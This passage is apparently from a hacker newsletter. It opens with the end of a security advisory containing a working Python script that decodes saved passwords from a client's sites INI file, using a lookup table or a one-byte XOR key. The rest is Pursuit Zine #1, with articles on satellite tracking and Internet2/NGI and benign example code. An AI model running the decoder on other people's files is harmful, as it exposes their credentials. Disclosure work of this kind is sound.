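    table does not cover (digits, punctuation and upper case were not tested)."""
    payload = hex_payload(stored)
    return "".join(REVERSE.get(payload[j:j + 2], "?") for j in range(0, len(payload), 2))


def decode_with_xor(stored):
    """Editor's observation, not stated in the advisory: every table entry is the
    letter's ASCII code XOR 0xAA, so the whole table collapses to a one-byte key."""
    return "".join(chr(b ^ 0xAA) for b in bytes.fromhex(hex_payload(stored)))


def recoverable_sites(ini_text):
    """List every site entry whose password is saved and therefore recoverable
    by anyone who can read the file; the decoded value proves the point."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    found = []
    for section in cfg.sections():
        if cfg.get(section, "SavePassword", fallback="0") != "1":
            continue
        stored = cfg.get(section, "Password", fallback="")
        found.append({
            "site": section,
            "host": cfg.get(section, "Host", fallback=""),
            "user": cfg.get(section, "User", fallback=""),
            "password": decode_with_table(stored),
        })
    return found


if __name__ == "__main__":
    for entry in recoverable_sites(SAMPLE_SITES_INI):
        print(f"{entry['site']}: {entry['user']}@{entry['host']} -> {entry['password']}")
```

      Any entry the script lists should be treated as an exposed credential and rotated.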
      
      Contact:
      --------
      
      I can be contacted on armour@swish.bur.st
      
      -Armour

      @HWA      
      
114.0 Pursuit Zine #1 (Aug 99)
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      Something I seem to have missed; looks like a one-off, so I'll preserve
      it here. You UK phreaks should like this; among other things it covers a
      few items of general interest. Have a gander. - Ed
      
      
       XXXX                                               X
     XXXX  XX   X     X  XX XXXX  XXXX     X     X   XX   XXXXX
       XX  XX  XX     XX   XXX   XX   XX  XX     XX  XX   XXX
       XX XX   XX     XX  XXX    XXX      XX     XX       XX
     XXXXXX    XX     XX  XX         XXX  XX     XX  XX   XX
      XX        XX   XX   XX     XX   XX   XX   XX   XX   XX
      XX          XXX      X      XXXXX      XXX    XXXX  XX
                                                          XX
                           [ P U R S U i T  -  a u g 9 9 ] X

      Index for this issue of PURSUiT
      
      [0x00] Introduction by the staff
      [0x01] Editor's notes by bxj
      [0x02] Internet2 (i2) and Next Generation Internet (NGI) by Cyphunk
      [0x05] AXS Script Makes WebServer Vulnerable by f0bic
      [0x06] Boxing in the UK (series) by Oktal
      [0x07] Introduction to firewalls by deadline
      [0x08] The FileThief exploit by Mister-X and Alkatraz
      [0x09] PURSUiT News update
      
      If you have an article you want us to publish, please e-mail it to
      bxj, foney_op or Cyphunk; after we read it we will decide whether
      to publish it in PURSUiT or not. In either case, the writer
      will be informed.
      
      I (bxj) can be contacted at <bxj@mail.com>, e-mails to f0bic can be
      sent to <f0bic@deadprotocol.org> and Cyphunk can be e-mailed to
      <mindmore@mindless.com> if needed. We all can be reached on the UnderNet
      IRC network, in the channels #HackTech #HackUK and #KIP.
      
      A note for Phrack editors: We come in peace.
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      ][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSU
      iT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PUR
      SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P
      '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
      
      '`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`
      ` Well, there is not much to tell, just read the editor's notes for  '
      ' information on the zine, and on each issue.                        `
      `                                                                    '
      ' We all would like to thank the following people for helping and    `
      ` making this zine possible:                                         '
      '                                                                    `
      ` Bill Clinton, Al Gore (hey, he invented the net), Monica Lewinsky, '
      ' Linda Tripp, Jay Leno, George Lucas, the New York Police,          `
      ` Jack the ripper (the one who cut people), The guy who invented     '
      ' air-conditioning, the guy who invented sneakers, Bose Inc.,        `
      ` And rest of the world, except the ones we really really hate.      '
      '                                                                    `
      ` Yeah, this one was just to fill up space, so just ignore it, and   '
      ' we were just kidding about the guy who invented sneakers.          `
      `                                                                    '
      ' Don't forget to read the news at the end of the zine.              `
      `                                                                    '
       `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
      
      
      
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
       _______________________
      [_______________________]
      [                       ]
      [    Editor's notes     ]
      [_______________________]
      [_______________________]
      
      
      What is PURSUiT? PURSUiT is about information. About knowledge.
      Knowledge is not power, it's an advantage. Information is the 
      real power. We will supply information, and educate on how to
      use that information. We will supply knowledge, and guide how
      to control that knowledge. 
      
      PURSUiT is here to share information, to teach the world what is
      really going on in the underground. No, we will not teach how
      to make a homemade atom bomb. And no, we will not instruct on how
      to kill your neighbors. We will tell you the stuff that really
      matters. 
      
      A little background. PURSUiT started somewhere in 1999, as an idea
      to get the old-school days back. To be a real, informative zine.
      We gathered some of the most skilled individuals of this industry,
      and became one. A smart man once said that a small group of skilled
      individuals, excellent in their performance and one with their
      cause, are better than a whole army. Commandos, they called it.
      Well, I believe PURSUiT are the commandos of today's digital world.
      
      Remember the old days, the days of the BBSs, the telecommunications 
      and computers revolution, the days when "Windows" was not a fluent 
      term in more than 80% of Earth's population, the days when there were
      almost no script kiddies, when the Internet was not a "super-highway"
      and when Geocities was not formed yet. The days when true Hackers lived.
      The days of learning, days of information and days of sharing.
      
      PURSUiT is here to return these days. 
      PURSUiT is bringing back the old-school.
      
      Peace out, and keep it real, always,
      
                      --bxj.
      
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      x                                                                  x
      x           Tracking Satellites Basics                             x
      x                                                                  x
      x                       By Overfien                                x
      x                                                                  x
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      
      
              There are 3 basic types of orbits you should be aware of when
      tracking satellites.
      
      1)  Low altitude circular orbits used by phase 2 satellites
      
      2)  Elliptical orbits as used by phase 3 sats.
      
      3)  Spacecraft and geostationary orbits planned for phase 4 satellites
      
              Satellites are moving targets, so when a ground station uses
      directional antennas, aiming information must be available.  Your average
      daily access time for a satellite is an important quantity in determining
      how useful the satellite will be to you.
      
              A low-altitude satellite (such as SBID, Fuji-OSCAR 20, RS-10/11
      or a microsat) will generally be in range for 25 minutes or less each
      time it passes by.
      
              A satellite in a high-altitude elliptical orbit, as used by phase 3
      spacecraft (such as VBeekon, OSCAR 10 and 13), behaves very differently.
      It will provide one or two passes per day, but the total access time will
      be (very roughly) 12 hours for Northern hemisphere stations.
      
              A geostationary satellite appears to hang motionless in the sky.
      If it's in range you'll have access to it 24 hours per day (unless the
      weather really sucks).  If it's out of range you'll never see it.
      
              Satellite enthusiasts wishing to track a satellite are interested
      in specific information.  They want to know:
              1) When the satellite will be in range; more specifically times
                 for AOS (acquisition of signal) and LOS (loss of signal) for
                 each pass.
              2) Where to aim the antenna (azimuth and elevation) at any time.
              3) The regions of the earth that have access to the satellite.
      
              There are two main methods of tracking: the graphic method and
      the computer method.  I would like to focus on the computer method.
      
              Tracking software naturally answers the basic tracking questions:
      it will tell you when the satellite is in range and provide you with
      antenna pointing data.  For example, at each specified time the program may
      list range (the distance between your station and the satellite), the Doppler
      shift for the mode you specify (which helps you locate your downlink), the
      height of the satellite (for elliptical orbits this varies), the phase or
      mean anomaly (a number that tells how close to you the satellite's antennas
      are currently aimed), predicted signal levels (on the downlink), path delay
      time (often labeled echo) and an orbit number (for reference purposes I
      believe - no effect on tracking).
      
              Let's look at the input the computer requires.  Naturally it will need
      the location of your ground station in terms of latitude and longitude.  Some
      newer programs may even ask for your height above sea level (this shouldn't
      have any observable effect for 99.99% of amateur satellite tracking
      programs), so even if you live in Seattle and have a monster EME antenna,
      you can just enter "0" or some approximate number if you don't know the
      correct value.
      
              The program also has to know the precise orbit of the satellite
      you're interested in, via orbit size, shape and orientation with respect to
      the earth/stars.  These are called orbital elements.  Now you're basically
      ready to track. For example, when I boot up my "sat box" (basically one of
      my boxes used just for tracking), a main menu pops up that asks:
              1) Do you want Batch tracking data
              2) Do you want real-time tracking data
              3) Do you want to modify parameters
              4) Move to graphical interface
              5) Exit program
      
              I respond by typing a single number (perhaps followed by the
      enter key).  If I respond "1" to obtain Batch tracking data, the program
      needs to know which satellite you're interested in and the date and time
      to start the calculations.
      
              We now take a look at the Batch output provided by a typical program.
      I am using the new version of IWI98:
      
      ADLMIL 3
      Ground Station: lat=39*N, long=77*W, Ht=0km
      DAY # 602 - - - Friday, August 20 - - - 1999
      UTC     AZ      EL      Doppler     Range
      HHMM    DEG     DEG     HZ          KM
      1145    167     5       -           18353
      1200    166     11      -1867       20664
      1215    165     16      -1733       22773
      1230    166     21      -1596       24694
      
      
              The heading identifies the satellite "ADLMIL 3" (HEH, I promise it's
      not a military satellite ;-)) and my ground station location (which I had
      to change for unexplainable reasons).  The first 3 columns of the table show
      time, azimuth and elevation.  ADLMIL 3 will come in range sometime between
      1145 and 1200 UTC and remain in range for 'bout 9.5 hours.  Column 4
      provides data on Doppler shift.  At 1200 UTC a signal coming through the
      mode B transponder will appear 1867 Hz lower than predicted using the
      transponder frequency.  Because of the algorithm being used to compute
      Doppler shift, no value is provided for 1145 UTC, the first time the
      satellite comes into range.
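      As an added illustration (editor's code, not from the article or from IWI98) of
      why the 1145 UTC row carries no Doppler value: a range-difference estimate needs a
      previous range, so the first row stays blank. It assumes a 145.9 MHz downlink,
      which the article does not give; the listing's Doppler column comes from the
      program's own model, so these estimates share its sign and trend, not its exact figures.

```python
"""Editor's added example: recompute a Doppler column from successive range
values in a batch tracking listing. Not code from the article or from IWI98."""

C_KM_S = 299792.458   # speed of light, km/s
STEP_S = 15 * 60      # the listing above prints one row every 15 minutes

# Rows copied from the batch listing above: (UTC hhmm, azimuth deg, elevation deg, range km)
BATCH_ROWS = [
    ("1145", 167, 5, 18353),
    ("1200", 166, 11, 20664),
    ("1215", 165, 16, 22773),
    ("1230", 166, 21, 24694),
]


def range_rate_km_s(prev_range_km, range_km, dt_s):
    """Finite-difference range rate: positive when the satellite is receding."""
    return (range_km - prev_range_km) / dt_s


def doppler_hz(downlink_hz, rate_km_s):
    """Non-relativistic Doppler shift of the downlink. A receding satellite
    (positive range rate) lowers the received frequency, hence the minus sign."""
    return -downlink_hz * rate_km_s / C_KM_S


def batch_doppler(rows, downlink_hz, step_s=STEP_S):
    """One Doppler estimate per row; None for the first row, because a
    range-difference algorithm has no earlier range to difference against
    (the same reason the listing prints '-' at 1145 UTC)."""
    out = []
    prev = None
    for _utc, _az, _el, rng in rows:
        if prev is None:
            out.append(None)
        else:
            out.append(doppler_hz(downlink_hz, range_rate_km_s(prev, rng, step_s)))
        prev = rng
    return out


def in_range_rows(rows):
    """Times at which the satellite is above the horizon (elevation > 0 deg),
    i.e. between AOS and LOS."""
    return [utc for utc, _az, el, _rng in rows if el > 0]


if __name__ == "__main__":
    # 145.9 MHz is an assumed 2 m downlink for illustration only.
    for row, d in zip(BATCH_ROWS, batch_doppler(BATCH_ROWS, 145.9e6)):
        print(row[0], "-" if d is None else f"{d:+.0f} Hz")
```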
      
              Alright, just as there's a jargon for practically everything, there's
      also one for satellite tracking.  Here it is, broken down:
      
      Access range (acquisition distance)
      
      Acquisition distance:  Maximum distance between the subsatellite point
                             and ground station at which access to spacecraft
                             is possible
      
      AOS (Acquisition Of Signal)
      
      Apogee: Point on orbit where satellite height is maximum
      
      Azimuth: Angle in the horizontal plane measured clockwise
               with respect to North (North = 0*)
      
      Epoch (Epoch time):  A reference time at which orbital elements are
                           specified
      
      EQX (ascending node)
      
      Ground track (subsatellite path):  Path on surface of earth traced out by
                                         SSP as satellite moves through space
      
      Increment (longitudinal increment)
      
      LOS (Loss Of Signal)
      
      Node:  Point where satellite ground track crosses the equator
      
      Pass (satellite pass)
      
      TCA (Time of Closest Approach):  Time at which satellite passes closest
                                       to a specific ground station during
                                       orbit of interest
      
      
      
              Well, this completes my text on satellite tracking basics.  Expect
      to see more articles in the future; until then, "watch the sky"!!
      
      Overfien@hushmail.com
      
      
      
      
      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
      [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
      ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
      =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
      ||PURSUiT is proud to present..                      ||
      ||                                                   ||
      || Internet2 (i2) and Next Generation Internet (NGI) ||
      ||                                                   ||
      ||               Compiled by Cyphunk                 ||
      ||                                                   ||
      =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
      
      -----------------------------------------------------
      - Internet2 (i2) and Next Generation Internet (NGI) -
      -----------------------------------------------------
      
      Internet2 and NGI are two advanced network initiatives by the US
      government (for NGI) and UCAID (University Corporation for Advanced
      Internet Development, for i2.) The key here is initiative. What I mean is
      that you won't find physical networks that are called Internet2 and NGI.
      Both NGI and i2 run over existing high speed US Backbone networks such as
      the vBNS, Abilene, ESNet and many others (discussed later). The only real
      thing that makes i2 and NGI different from each other is who is in
      charge. You will see many NGI and i2 peers that are registered under both
      initiatives. The requirements for becoming a peer on one of these
      networks are:
           1) You have a project that requires very reliable and high-speed
              connections to other i2 peers.
           2) You have a lot of money. 
      
      The reason for these initiatives was/is:
           1) To foster high speed applications that cannot run on the 
              existing Internet and need a guaranteed connection.
           2) To develop smarter network services and ways of guaranteeing 
              bandwidth and latency rates.
           3) To increase collaboration of National-to-National and
              National-to-International research departments (commercial, 
              academic and governmental).
      
      A question that may arise is: "Why not just upgrade the existing Internet
      and use that as the platform for advanced research?" The reason this was
      not done is because it has become obvious over time that no matter how
      much bandwidth you throw to the Internet it will be over used. So,
      instead of thinking BIGGER the NGI and i2 initiatives are mainly about
      thinking SMARTER. These networks are private to their peers and those
      peers must have a Research and Development related purpose for being
      there. This cuts out the general, bandwidth sucking, public right from
      the start. In order to keep the i2 and NGI peers from causing the same
      problems amongst themselves, advanced services and "Quality of Service"
      (QoS) systems and policies have been developed and put in place over
      these networks to keep one peer from stepping on the toes (line quality)
      of another. 
      
      The end goal of many of the advanced applications and technologies being
      developed by i2 and NGI peers is to have them introduced to the public
      and commercialized through places such as the Internet. Types of
      applications already being developed involve TeleImmersion and
      TeleMedicine (to think of a few).
      
      After thinking and working *smarter* these networks will go *bigger* and
      faster. Amongst the goals of i2 and NGI is to develop the fastest and
      most efficient networks on the planet to "further the US lead in the
      global IT market" (whatever). To do so, both sides will work together on
      finding ways to work more efficiently and develop faster hardware
      devices. When at i2 and NGI conferences you may hear a lot of talk about
      TeraPOPs (Terabit Points of Access). Though there are no TeraPOPs out
      there yet, they are definitely on the horizon (a few years off).
      
      Practically all of the literature on the net concerning i2 and NGI is
      incomplete. The problem is that most of the papers are in M$ PowerPoint
      format, which really does no good except for the person who created it.
      It's like looking at a teacher's notes when you're not the teacher; it's
      not helpful. I hope to make this somewhat complete and understandable.
      However, considering that many of the pieces of these two networks are
      still under development, don't be surprised if there are some gaps and
      you finish with more questions than you started with. My one request,
      however, is that you e-mail me at: mindmore@mindless.com with the
      questions that this article may raise and any comments/corrections you
      may have. This article attempts to detail the services and the goals of
      both NGI and i2. I'll try not to bore you though :)
      Note: It helps if you already have an understanding of Networking (OSI
      Layers, Protocols, devices and the like) to understand the details of i2
      and NGI. Also, I realize that there are probably a lot of grammar errors,
      thanks for bearing with me.
      
      This paper is split up into 4 sections. The first discusses the Services
      provided by NGI and i2 (QoS, Multicasting, and IPv6). The second
      discusses i2 and NGI separately, covering the characteristics of the two
      individually. The third discusses the physical characteristics of the
      networks that the i2 and NGI peers connect through. The fourth, a brief
      section, discusses security issues that I see.
      
      I. Services
      ------------------------------------------------------------------------
      As I said before, both i2 and NGI support and are active in developing
      the standards for IPv6, QoS and Multicasting. I will try to get into each
      network's implementation of these services later. The purpose of this
      section is to introduce you to the services I just mentioned so that you
      have a basic understanding of them.
      
      > IPv6 in brief
      IPv6, also known as IPng (IP Next Generation), is the *upgrade* to the
      currently overstretched IPv4 addressing protocol. These addresses are
      called IP addresses and every computer on the net must have a unique IP
      address to communicate on the Internet. There are a lot of computers on
      the net and very soon there won't be enough IPv4 addresses left for them.
      IPv4 addresses are 32-bit addresses. This allows for 4,294,967,296
      possible numbers. However, I'm guessing that after segmentation we get
      around 1.5 billion or so addresses. When this protocol was defined it was
      thought that a 32-bit address would be plenty. After all, how many
      computers could the small group of DARPA Geeks own :). However, the
      Internet became something more than a high speed government and academic
      network and moved into the public/global domain. Today we are coming to a
      point where we just don't have enough IP addresses. I mean, you call your
      ISP and ask them how much it would cost to get your own Static IP address
      from them. For me, with my ISP, it is $20 more a month. That is a big
      jump from FREE.
      
      So, the guys and gals at the IETF (Internet Engineering Task Force) have
      been working on IPv6, which will fix these problems. IPv6 gives us
      128-bit addresses, represented in binary, of course, and in hexadecimal.
      128 bits give 18,446,744,073,709,551,616 squared possible numbers, which
      should last us until the transition of the Internet from public/global
      to extraterrestrial/public/universal. There is more to the protocol than
      just an increased address space, however. The header structure of the IP
      packet has changed. IPv6 headers are somewhat larger than IPv4 headers,
      but IPv6 headers are much more simplified. For instance, IPv4 header
      sizes can vary whereas IPv6 headers are always 40 bytes. Making the
      headers a fixed size allows for easier processing. IPv6 has also taken
      away some of the unused fields that were in IPv4, making it simpler. It
      has also added optional fields that can be used for increased security.
      For example, IPv6 encryption headers indicate which encryption keys to
      use, and carry other handshaking information.
      
      For more info check the IPv6 related RFCs; there are a ton of them.
      
      > QoS
      One thing that people are starting to realize is that no matter how much
      bandwidth you throw to the public or private sector, they always use it
      and over use it. Though one objective of i2 and NGI is to increase
      bandwidth capacity, the other is to manage or regulate who has access to
      that bandwidth, how much of it and the quality of it.
      
      The Internet currently runs as a "Best Effort" service network. This
      means that if the TIT (Tokyo Institute of Technology) NanoTech department
      needs 5mbps with no more than a 200ms delay for a joint project with MIT
      (Massachusetts Institute of Technology) over the Internet, they will rely
      on pure luck to get what they need: luck that the lines from them to MIT
      will not be saturated with traffic at that time. This is a big problem,
      because this sort of luck rarely ever happens over the Internet. We need
      to develop a way to guarantee them the bandwidth and quality they need
      for that period of time.
      
      This is done through QoS (Quality of Service), whose development is
      primarily the job of the IETF (Internet Engineering Task Force) QoS
      workgroup. One objective of NGI and i2 is to guarantee end to end QoS,
      which means that whether it takes 10 hops to get from TIT in Tokyo to MIT
      or 2 hops, they will be guaranteed 5mbps and 200ms all the way.
      Currently there are two basic standards being used for QoS: the
      RSVP protocol and DiffServ.
      
      >> RSVP (Resource ReSerVation Protocol)
      RSVP guarantees end to end bandwidth reservations and delay times from
      node to node. DiffServ works more on a BB (Bandwidth Broker, i.e. ISP)
      -to-BB or Network-to-Network basis, whereas RSVP works on a node to node
      basis. This allows for tighter QoS and is necessary for Multicasting,
      but is not as flexible as DiffServ. RSVP supports multicast groups
      (discussed later) and operates on top of IPv4 or IPv6, acting like a
      layer 4 protocol. RSVP also acts like a routing protocol, though it does
      not take the place of existing routing protocols; it operates on top of
      them (adding features where needed). RSVP causes a higher strain on the
      network due to the fact that there is checking going on from node to
      node.
      
      For more information on RSVP check out rfc1633 and rfc2205
      
      >> DiffServ (Differentiated Services)
      DiffServ causes less strain on a network than RSVP does. For this reason,
      it is the preferred method. However, DiffServ doesn't guarantee the
      connection as well and as tightly as RSVP does, so there are trade-offs.
      DiffServ works by labeling packets with "per-hop behaviors" (PHBs).
      PHBs basically define the level of service that a packet will need.
      The PHB is initially defined on the edge routers (closest to the sending
      device). End devices on the network have the job of reshaping traffic as
      it leaves the domain, taking into account any burst traffic that may
      occur. DiffServ assures a basic throughput but allows for bursts when
      resource availability permits (depending on the PHB type assigned to the
      packet). All the information needed for DiffServ is held in the DS field
      in the IP header.
      In all likelihood we will not be implementing DiffServ on our home or
      small networks, or even large ones for that matter. It will be the
      responsibility of your BB (Bandwidth Broker, also known as your ISP) to
      provide DiffServ where needed. It will be the BB's job to aggregate all
      of their DiffServ traffic into one stream before it is sent out of the
      network and onto another.
      Last thing: DiffServ, unlike RSVP, has no built-in support for
      multicasting.
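
      Since the whole DiffServ decision rides on one byte of the IP header, it
      helps to see that byte decoded. The following Python is an added example
      written for this edition, not code from the article or from the IETF
      working group; the packet builder, the 10.0.0.1/10.0.0.2 addresses and
      the ingress_remark policy are constructed for illustration, and the PHB
      names follow RFC 2474, RFC 2597 and RFC 3246.

```python
"""Decode and (re)mark the DiffServ field of an IPv4 header.

Added example, not part of the article. The DS field is the second
byte of the IPv4 header (the old Type of Service byte): its top six bits
are the DSCP, which selects the per-hop behavior, and the bottom two
bits are ECN. PHB names follow RFC 2474 (class selectors), RFC 2597
(assured forwarding) and RFC 3246 (expedited forwarding).
"""
import struct

# Well-known DSCP values -> PHB names.
PHB_NAMES = {0: "Default (best effort)", 46: "EF"}
for _cls in range(1, 8):                       # CS1..CS7 = class << 3
    PHB_NAMES[_cls << 3] = f"CS{_cls}"
for _cls in range(1, 5):                       # AFxy = 8*x + 2*y
    for _drop in range(1, 4):
        PHB_NAMES[(_cls << 3) | (_drop << 1)] = f"AF{_cls}{_drop}"


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum over the header, checksum field included."""
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(dscp: int, ecn: int = 0, payload_len: int = 0) -> bytes:
    """Build a minimal 20-byte IPv4/UDP header carrying the given DS field.

    The addresses 10.0.0.1 -> 10.0.0.2 are constructed sample values.
    """
    tos = (dscp << 2) | ecn
    fields = [0x45, tos, 20 + payload_len, 0, 0, 64, 17, 0,
              bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])]
    header = struct.pack("!BBHHHBBH4s4s", *fields)
    fields[7] = ipv4_checksum(header)          # fill in the checksum
    return struct.pack("!BBHHHBBH4s4s", *fields)


def parse_ds_field(packet: bytes) -> dict:
    """Return DSCP, ECN and PHB name for a raw IPv4 packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    hdr_len = (packet[0] & 0x0F) * 4
    if ipv4_checksum(packet[:hdr_len]) != 0:
        raise ValueError("bad header checksum")
    dscp, ecn = packet[1] >> 2, packet[1] & 0x3
    return {"dscp": dscp, "ecn": ecn,
            "phb": PHB_NAMES.get(dscp, f"unassigned ({dscp})")}


def set_dscp(packet: bytes, dscp: int) -> bytes:
    """Rewrite the DSCP (keeping ECN) and recompute the header checksum."""
    if not 0 <= dscp < 64:
        raise ValueError("DSCP is a 6-bit value")
    hdr_len = (packet[0] & 0x0F) * 4
    hdr = bytearray(packet[:hdr_len])
    hdr[1] = (dscp << 2) | (hdr[1] & 0x3)
    hdr[10:12] = b"\x00\x00"                    # zero before recomputing
    struct.pack_into("!H", hdr, 10, ipv4_checksum(hdr))
    return bytes(hdr) + packet[hdr_len:]


def ingress_remark(packet: bytes, trusted: bool) -> bytes:
    """Edge-router policy (assumed, not from the article): keep the DSCP set
    by a trusted neighbour domain, but reset marks arriving from an untrusted
    one to best effort so an outside sender cannot claim premium service."""
    return packet if trusted else set_dscp(packet, 0)


if __name__ == "__main__":
    pkt = build_ipv4_header(46)                # constructed EF-marked packet
    print(parse_ds_field(pkt))
    print(parse_ds_field(ingress_remark(pkt, trusted=False)))
```

      Resetting marks at the domain edge is the part a BB cannot skip: the DS
      field is a plain header byte that any sender can set, so accepting DSCP
      values from an untrusted neighbour would let a customer, or anyone
      spoofing one, claim premium treatment for free. The checksum is
      recomputed because rewriting the byte invalidates the IPv4 header
      checksum.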
      
      For the purpose of testing QoS methods, the QBONE initiative was created
      in 1998. The QBONE is a joint effort of academic, governmental and
      corporate researchers and engineers, created as a wide area testbed for
      QoS protocols. It crosses both NGI and i2 borders, operating through
      almost all of the advanced networks in the US and abroad (such as vBNS,
      Abilene, ESNet and CA*NET, which are discussed later).
      
      For more details on the QBONE and QoS try
      http://www.internet2.edu/qbone/.
      
      > IP Multicasting
      Let's say that both you and I live in the same city and use the same
      Internet provider. Let's also say that we are both listening to a live
      stream (if they one day do live) of Geeks in Space
      (www.the-sync.com/geeks) at the exact same time. This means that the same
      datagrams are coming to the same network, the same POP, at the same time,
      like so:
       _____                  ____
      |Geeks|----Stream1-----|our |-------- Me 
      | in  |                |Lame|
      |Space|----Stream2-----|ISP |-------- You
       -----                  ----
      
      It would certainly be to the entire Internet's advantage, and ours, if we
      could combine those two streams into one, creating less congestion on the
      network. IP Multicasting refers to doing exactly that. Example:
      
       _____                  ____
      |Geeks|                |our |-------- Me 
      | in  |----Stream------|Lame|
      |Space|                |ISP |-------- You
       -----                  ----
      
      In the above example there is only one stream of datagrams going out over
      the Internet, but once it gets to our ISP the ISP splits the stream into
      two and sends Geeks In Space to you and me at the same time. In order to
      do this it creates "Multicasting Groups" for each stream (both you and I
      being in the same group). It also requires smart routers which can
      replicate streams and keep track of and create these groups, dynamically
      adding users when needed. Also, the routers all along the way from the
      Real Audio server to our ISP must support IP multicast protocols such as
      DVMRP (Distance Vector Multicast Routing Protocol), PIM (Protocol
      Independent Multicast) or MOSPF (Multicast Open Shortest Path First).
      To use IP multicasting today you must connect to an existing network
      within the public Internet known as the MBONE (at least, that is where
      all the action is). Before you can do that, however, your ISP must
      support multicasting. Check with them to see if they do; if not, switch
      ISPs. For more information about the MBONE and IP multicasting check out
      www.mbone.com. For even more info on multicasting try
      www.ncne.nlanr.net/faq/multicast.html
      
      
      II. NGI and i2
      ------------------------------------------------------------------------
      Like I said before, the NGI and i2 initiatives are almost identical. They
      operate on, mostly, the same networks and backbones. They have pretty
      much the same goals. However, there are a few things that make them
      different, other than who is in control of each initiative and the budget
      that they have. The following takes a look at each initiative.
      
      > NGI
      In the NGI there are a few different Government organizations that are
      involved in making the goals of NGI a reality. Those organizations are
      DARPA (Defense Advanced Research Projects Agency), NSF (National Science
      Foundation), NASA (National Aeronautics and Space Administration), NIST
      (National Institute of Standards and Technology), NLM (National Library
      of Medicine) and the DoE (Department of Energy). Each of these
      organizations has different responsibilities, some overlapping in areas.
      Each of these organizations has its own physical networks that it
      can test things out on (some of which are discussed later). I'm not going
      to discuss the specifics of what their jobs are; if you want more
      information go to: www.ngi.gov
      
      The NGI project budget for 1998 was $80 million US Dollars; for 1999 it
      is $110 million, and for 2000 it will be $110 million. The project was
      only granted 3 years of funding by Congress but is planned up to 2002 (I
      guess the budget comes later). There is a possibility that it could be
      extended even farther, however. There are a number of very specific goals
      for NGI:
      To develop an NGI testbed that supports end-to-end QoS for new networking
      technologies and advanced research. This testbed will connect at least
      100 NGI sites - universities, Federal research institutions, and other
      research partners - at speeds 100 times faster than today's Internet
      (OC-3 - 155mbps), and will connect 10 sites at speeds 1,000 times faster
      than the current Internet (OC-48 - 2.5gbps).
      Another goal of the NGI is to demonstrate Terabit switching technology by
      2002. At the NGI/i2 conference I went to there was a professor from
      Hebrew University Israel who gave a lecture on an Optical Terabit switch
      that he had developed and tested. The switch could do well over 1tbps
      with hop rates of 10ms. That certainly grabbed the attention of the NSF
      guys at the conference. The device is supposed to go into production
      sometime in two years, as I remember.
      
      The NGI network is spread out over several different networks. The ones
      that I know of are: vBNS (run by NSF), Abilene (run by UCAID), ESNet (run
      by DoE) and NREN (run by NASA).
      In order for a corporation or university to hook up to NGI it must
      connect to one of these backbones. In many cases we see the
      requesting peer just connect to a GigaPOP which is already connected
      to one of the backbone NAPs. Then they must arrange (with the NSF I
      believe) to be added to the NGI registrar and routing tables. In many
      cases, the organization or university can get government funding from the
      NSF.
      
      > i2
      Internet2 is an advanced network initiative by UCAID (University
      Corporation for Advanced Internet Development) and several other
      corporations. The budget is about $80 million a year. i2, like NGI, is
      spread out over various high speed backbones in the US. The two major
      ones are vBNS and Abilene, which will be discussed later. In most cases
      universities will connect to GigaPOPs which in turn connect to one of the
      i2 backbones.
      i2, like NGI, is involved with implementing and developing QoS, IPv6 and
      advanced network applications. There is no real literature on the net
      that discusses the goals of i2. The talk is more around the backbones
      that it operates on.
      
      III. Advanced high speed backbones
      ------------------------------------------------------------------------
      As I said before, both i2 and NGI run over several high speed backbone
      networks. The following discusses a few of them in detail.
      
      > vBNS
      The NSF initiated the very high speed Backbone Network Service (vBNS) in
      1995. With help from MCI the NSF set up a high speed backbone across the
      US. The purpose was to connect Government, Industry and Universities to 5
      SCCs (Super Computing Centers) in the US and then, inevitably, to each
      other. For those interested, those 5 SCCs are:
      - Cornell Theory Center 
      - National Center for Atmospheric Research 
      - Pittsburgh Supercomputer Center 
      - National Center for Supercomputer Applications 
      - San Diego Supercomputer Center 
      
